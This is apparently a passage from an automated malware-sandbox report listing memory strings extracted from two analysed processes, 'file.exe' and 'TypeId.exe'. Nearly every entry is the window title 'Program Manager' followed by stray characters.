                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqHF
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqHE
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqHG
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqHJ
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqHI
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqH{
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqhYh
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq\@y
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqX9d
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqpi{
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqHw
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqHy
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqP(v
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqHl
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqhX|
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqHk
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqHn
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqHm
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqHp
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqHo
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqHd
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqHf
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq8|W
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqHe
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqHi
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq`Jc
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@^
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqhZq
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqdQx
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqL ~
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqL
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqlbf
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqpjg
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqx9|
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqLB
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqpkp
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqLE
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcql!y
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqH]W
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqL9
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqL0
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqL2
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqtse
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqL5
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqt1o
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqL-
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqDX
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqDY
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqD[
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqD]
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqDO
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqTmz
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqDS
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq4,u
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqDH
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqDG
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqDJ
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqDL
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqDK
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqDN
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqDM
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqD@
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqDC
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqDE
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqD|
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqD~
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq G^
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqDp
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq4p`
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqDq
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqL^p
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqDu
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqDi
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq8wd
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqDk
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqDn
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq,_a
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqPfe
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq86w
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqx5W
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqH
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqH"
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq8yY
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqH!
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqXw|
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqToo
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq4.j
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqTpx
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqH>
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqH4
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqH7
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq<@a
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqH:
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqH9
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqpf}
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqH0
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqXxh
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqH2
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqL_y
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqHXd
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@Gv
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqdH`
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@S
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@X
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq|6p
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@L
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@N
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@P
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@O
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@H
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@G
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqtgx
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@J
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq\7a
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqp`c
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@>
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq<{{
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@v
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@u
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@y
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@k
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@n
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@p
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq|7y
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Managerx
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqxqb
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq$Jl
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqX0]
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@j
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@\
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@^
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@]
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq8sn
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@`
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@a
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq8tw
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqAs
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq<|g
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@~
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq$Ku
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqD9
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq4+l
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqD1
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqHTn
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqD4
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqD3
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqD5
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqt)`
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqD(
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqD'
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqD!
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq<}p
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqD$
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqD#
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqD&
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqD%
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq<Q
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq<S
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq<J
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq<L
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program Manager,
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq<K
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq<@
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqhKn
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq|x
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq|w
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq\3k
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq<9
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq<<
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq<;
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq<>
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq|}
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq\4t
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq<r
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqLVa
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqp]e
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq<s
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq<u
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq@>^
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq<`
                Source: file.exe, 00000006.00000002.4559068186.00000000027DB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq<a
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqtdz
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq<d
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqT#u
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqhLw
                Source: TypeId.exe, 0000000A.00000002.4558808915.00000000029F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcq<X
                Source: file.exe, 00000006.00000002.4559068186.000000000266F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqx,n
                Source: file.exe, 00000006.00000002.4559068186.0000000002563000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Program ManagerLRcqHO]
